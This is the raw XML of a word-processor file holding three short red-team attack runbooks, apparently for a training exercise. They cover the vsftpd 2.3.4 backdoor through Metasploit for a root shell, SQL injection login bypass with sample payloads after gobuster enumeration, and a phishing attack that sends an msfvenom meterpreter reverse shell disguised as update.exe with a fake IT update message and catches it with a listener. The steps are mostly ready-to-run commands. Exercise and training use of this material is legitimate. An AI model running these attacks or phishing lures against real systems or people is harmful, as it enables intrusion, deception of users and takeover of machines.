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0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Runbook 1</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/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28"/>
        <w:gridCol w:w="494"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1285"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497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Document Name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IRTx Red Run 1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Version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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417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Author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Dylan Wondal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Created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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Attack Type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Vsftpd backdoor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Last Modified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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Staff Required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 Attacker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Skills Required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Nmap, Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1528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Document 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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8116" w:type="dxa"/>
            <w:gridSpan w:val="5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This document is to scan and attack a server that uses the vulnerable version of Vsftpd 2.3.4 that has a backdoor builtin</w:t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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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35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Scanning/Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is the vulnerable service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nmap -sC -sV -oN init.scan $IP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Check outputs for the vsftpd 2.3.4 header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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837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Prepare Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Run the MSFconsole and select the vsftpd backdoor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>
                <w:kern w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>u</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>se exploit/unix/ftp/vsftpd_234_backdoor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>
                <w:rStyle w:val="SourceText"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>set targets – ip and port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285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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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16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Execute Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Execute the payload and wait to receive the reverse shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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18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Connect to shell and have root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>The shell should automatically connect and you should have access, run id to ensure you have root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Runbook 2</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/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28"/>
        <w:gridCol w:w="494"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1285"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497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Document Name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IRTx Red Run 2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Version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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417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Author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Dylan Wondal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Created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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Attack Type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SQL Injection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Last Modified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11/9/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Staff Required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 Attacker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Skills Required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Nmap, SQLi, Web, Gobuster</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1528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Document 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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8116" w:type="dxa"/>
            <w:gridSpan w:val="5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This document is to scan and attack a server that may have a vulnerable web page/login with SQL injection</w:t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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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35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Scanning/Enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Perform an aggressive Nmap scan and enumerate all open ports and their headers to determine if there is a web service running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nmap -sC -sV -oN init.scan $IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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837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Webpage enumeration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Look through the webpage for a login page or a search bar.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This can be done manually or gobuster can be used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gobuser dir -u $WEB -w </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>“/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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16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Test login page for SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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Test the login for basic SQLi with the following payloads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‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>OR 1=1; --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admin--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plus more </w:t>
            </w:r>
            <w:hyperlink r:id="rId2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:kern w:val="0"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>https://book.hacktricks.xyz/pentesting-web/sql-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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18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Perform PrivEsc once logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Once successfully logged in as admin, determine how to perform privesc and go from there.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t xml:space="preserve">Runbook </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/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28"/>
        <w:gridCol w:w="494"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1757"/>
        <w:gridCol w:w="1285"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497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Document Name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IRTx Red Run </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>3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Version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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417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Author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Dylan Wondal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Created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9/10/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Attack Type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Phishing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Last Modified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9/10/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411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Staff Required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 Attacker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Skills Required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Msfvenom, metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1528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Document 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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8116" w:type="dxa"/>
            <w:gridSpan w:val="5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This is attack is a phishing attack where the attacker persuades the user to download the reverse shell created by msfvenom</w:t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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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35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Create malicious file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="PreformattedText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bookmarkStart w:id="0" w:name="msfvenom-command"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f exe -o update.exe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/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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837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Send file to victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Send file to victim with persuading text e.g. download update for software, email by IT team</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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16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Listen for shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="PreformattedText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bookmarkStart w:id="1" w:name="listener-command"/>
            <w:bookmarkEnd w:id="1"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"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/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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5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18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Connect to shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6337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b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Wait for shell to land, priv esc if needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1285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AU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ook.hacktricks.xyz/pentesting-web/sql-injection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LibreOffice/7.3.7.2$Linux_X86_64 LibreOffice_project/30$Build-2</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>3</Pages>
  <Words>460</Words>
  <Characters>2500</Characters>
  <CharactersWithSpaces>2835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2023-09-11T11:29:06Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-AU</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T08:29:23Z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